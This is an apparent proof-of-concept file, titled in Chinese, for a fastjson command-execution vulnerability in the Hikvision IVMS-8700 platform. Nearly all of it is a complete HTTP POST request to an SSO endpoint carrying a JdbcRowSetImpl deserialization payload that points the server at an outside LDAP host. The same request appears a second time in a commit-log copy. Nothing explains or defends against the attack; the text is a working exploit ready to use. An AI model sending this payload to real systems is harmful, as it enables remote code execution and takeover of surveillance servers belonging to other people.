POC00/海康威视IVMS-8700 fastjson命令执行漏洞.md

## 海康威视IVMS-8700 fastjson命令执行漏洞

```
POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 204

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://kjvqweuoav.dnstunnel.run","autoCommit":true},"hfe4zyyzldp":"="}
```
Create 海康威视IVMS-8700 fastjson命令执行漏洞.md 2023-08-19 21:05:14 +08:00			`## 海康威视IVMS-8700 fastjson命令执行漏洞`

			```
			`POST /bic/ssoService/v1/applyCT HTTP/1.1`
			`Host: 127.0.0.1`
			`Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2`
			`Upgrade-Insecure-Requests: 1`
			`Sec-Fetch-Dest: document`
			`Sec-Fetch-Mode: navigate`
			`Sec-Fetch-Site: cross-site`
			`Sec-Fetch-User: ?1`
			`Te: trailers`
			`Content-Type: application/json`
			`Content-Length: 204`

			`{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://kjvqweuoav.dnstunnel.run","autoCommit":true},"hfe4zyyzldp":"="}`
			```